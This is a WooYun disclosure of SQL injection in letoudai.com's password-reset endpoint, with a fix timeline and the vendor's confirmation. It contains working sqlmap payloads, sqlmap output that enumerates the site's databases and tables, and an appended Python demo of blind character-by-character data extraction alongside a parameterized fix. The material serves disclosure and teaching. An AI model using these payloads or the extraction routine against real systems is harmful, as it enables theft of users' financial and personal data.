
Vulnerability summary

Defect ID: wooyun-2015-0154292

Title: P2P wealth-management platform security: SQL injection in Letoudai (exposes roughly 150,000 users' account passwords, payment passwords, real names, bank card numbers and other data)

Vendor: letoudai.com

Author: 路人甲

Submitted: 2015-11-20 17:21

Fixed: 2016-01-11 15:32

Published: 2016-01-11 15:32

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 15

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-11-20: Details sent to the vendor, awaiting vendor handling
2015-11-20: Vendor confirmed; details visible to the vendor only
2015-11-30: Details disclosed to core white hats and domain experts
2015-12-10: Details disclosed to regular white hats
2015-12-20: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public

Brief description:

DBA privileges.

Detailed description:

The account (username) parameter of the forgot-password flow is injectable. Endpoint and POST body:
http://www.letoudai.com/users/self/reset_password
account=1&code=94102&step=1

Proof of vulnerability (sqlmap output):

---
Parameter: account (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: account=-8043') OR 2328=2328 AND ('QPsY'='QPsY&code=94102&step=1
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: account=1');(SELECT * FROM (SELECT(SLEEP(5)))cueQ)#&code=94102&step=1
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (SELECT)
Payload: account=1') OR (SELECT * FROM (SELECT(SLEEP(5)))MlQo) AND ('Wzah'='Wzah&code=94102&step=1
---
web application technology: PHP 5.5.21, Nginx
back-end DBMS: MySQL 5.0.11
current user: 'ltd@%'
current user is DBA: True
available databases [5]:
[*] information_schema
[*] ltd
[*] ltd_test
[*] mysql
[*] performance_schema
Database: ltd
+------------------------+---------+
| Table | Entries |
+------------------------+---------+
| ltd_journal_account | 63565 |
| ltd_jifen_log | 53052 |
| ltd_ips_return | 51210 |
| ltd_user_log | 48718 |
| ltd_phone_log | 37702 |
| ltd_account_log | 35828 |
| ltd_borrow_repay | 25746 |
| ltd_weixin_news | 22315 |
| ltd_user_message | 20712 |
| ltd_email_log | 20555 |
| ltd_ips_before | 19331 |
| ltd_account | 15111 |
| ltd_user | 15109 |
| ltd_user_info | 15109 |
| ltd_user_status | 15109 |
| ltd_user_vip | 13047 |
| ltd_error_log | 9101 |
| ltd_borrow_tender | 8600 |
| ltd_user_spread | 8324 |
| ltd_account_recharge | 6397 |
| ltd_attachment | 5925 |
| ltd_activity_log | 5793 |
| ltd_account_cash | 4018 |
| ltd_borrow_verify | 669 |
| ltd_user_setting | 396 |
| ltd_borrow_quota | 344 |
| ltd_borrow | 278 |
| ltd_document | 251 |
| ltd_borrow_reward | 204 |
| ltd_authmenu | 177 |
| ltd_menu | 169 |
| ltd_auth | 158 |
| ltd_borrow_che | 116 |
| ltd_rating_info | 114 |
| ltd_attribute | 85 |
| ltd_borrow_vouch | 77 |
| ltd_borrow_vip | 71 |
| ltd_borrow_register | 66 |
| ltd_config | 49 |
| ltd_user_auto | 45 |
| ltd_borrow_pawn | 40 |
| ltd_jifen_exchange | 34 |
| ltd_user_address | 32 |
| ltd_weixindy_reply | 28 |
| ltd_borrow_novice | 21 |
| ltd_jifen_product | 19 |
| ltd_manage_member | 18 |
| ltd_linkages | 15 |
| ltd_template | 14 |
| ltd_borrow_roam | 12 |
| ltd_document_category | 12 |
| ltd_weixin_menu | 12 |
| ltd_model | 10 |
| ltd_weixindy_menu | 10 |
| ltd_manage_group | 9 |
| ltd_remind | 9 |
| ltd_borrow_category | 8 |
| ltd_stock | 8 |
| ltd_navigation | 7 |
| ltd_addons | 6 |
| ltd_borrow_credit | 6 |
| ltd_borrow_institution | 6 |
| ltd_borrow_repayment | 6 |
| ltd_topic_config | 5 |
| ltd_autorepay_rule | 4 |
| ltd_weixin_media | 4 |
| ltd_api_account | 3 |
| ltd_hooks | 3 |
| ltd_user_autorepay | 3 |
| ltd_user_group | 3 |
| ltd_topic | 2 |
| ltd_jifen_category | 1 |
| ltd_topic_reply | 1 |
| ltd_topic_signin | 1 |
| ltd_weixin_repay | 1 |
+------------------------+---------+


[Screenshot attachment: 20151119133248.png]

Remediation:

fix
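As an added example (not part of the original report and not Letoudai's code), the following Python reproduces the flaw class described above against an in-memory SQLite table. The `account` value is spliced into a query shaped like `WHERE account = ('...')`, which is what the `')` closure in the report's sqlmap payloads implies about the original query; the report's boolean payload then makes the lookup return every row, and a boolean oracle built on the same query pulls a value out character by character, showing how a "boolean-based blind" finding turns into data exfiltration. The parameterized lookup beside it returns nothing for the same payload, which is the fix the one-word remediation above points at. The table schema, sample rows, and exact query shape are assumptions constructed for the demo; the stacked-query and SLEEP() payloads in the report are MySQL-specific and are not reproduced here.

```python
import sqlite3

# Constructed sample data for the demo (not taken from the report).
SAMPLE_USERS = [
    ("alice", "alice@example.com"),
    ("bob", "bob@example.com"),
    ("carol", "carol@example.com"),
]

# The boolean-based payload quoted verbatim from the report's sqlmap output.
BOOLEAN_PAYLOAD = "-8043') OR 2328=2328 AND ('QPsY'='QPsY"


def make_db():
    """In-memory SQLite table standing in for the site's MySQL ltd_user table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ltd_user (account TEXT, email TEXT)")
    conn.executemany("INSERT INTO ltd_user VALUES (?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_lookup(conn, account):
    """Hypothetical reconstruction of the flawed query: the POST field is
    concatenated into the SQL text. The "')" in the report's payloads implies
    the value sat inside ('...'), which this query shape reproduces."""
    sql = "SELECT account FROM ltd_user WHERE account = ('%s')" % account
    return [row[0] for row in conn.execute(sql)]


def safe_lookup(conn, account):
    """Hardened form: the value travels as a bound parameter, never as SQL text."""
    sql = "SELECT account FROM ltd_user WHERE account = ?"
    return [row[0] for row in conn.execute(sql, (account,))]


def blind_oracle(conn, condition):
    """Boolean oracle: True when `condition` holds, judged only by whether the
    vulnerable query returns any rows. AND binds tighter than OR, so the WHERE
    clause becomes  account = ('-1') OR ((condition) AND ('x'='x'))."""
    payload = "-1') OR (%s) AND ('x'='x" % condition
    return len(vulnerable_lookup(conn, payload)) > 0


def extract_via_blind(conn, expr, max_len=64):
    """Recover the string value of scalar SQL expression `expr` one character
    at a time, binary-searching each code point with yes/no answers only.
    SQLite's unicode() plays the role MySQL's ORD()/ASCII() would on the real target."""
    recovered = ""
    for pos in range(1, max_len + 1):
        if not blind_oracle(conn, "length(%s) >= %d" % (expr, pos)):
            break  # string exhausted
        lo, hi = 0, 127  # 7-bit ASCII is assumed for the demo
        while lo < hi:
            mid = (lo + hi) // 2
            if blind_oracle(conn, "unicode(substr(%s, %d, 1)) > %d" % (expr, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, legitimate input:", vulnerable_lookup(db, "alice"))
    print("vulnerable, report payload:  ", vulnerable_lookup(db, BOOLEAN_PAYLOAD))
    print("parameterized, same payload: ", safe_lookup(db, BOOLEAN_PAYLOAD))
    print("blind extraction:            ",
          extract_via_blind(db, "(SELECT email FROM ltd_user ORDER BY account LIMIT 1)"))
```

The oracle needs roughly seven requests per character, which is why sqlmap can enumerate the current user, the database list, and the table counts shown above from nothing more than a true/false difference in the response. Bound parameters remove the whole class: the payload is compared as a literal username and matches nothing.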

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 15

Confirmed: 2015-11-20 17:23

Vendor reply:

Thanks to the finder for the submission; our company has handled it promptly.
Thanks again for your submission.

Latest status:

None yet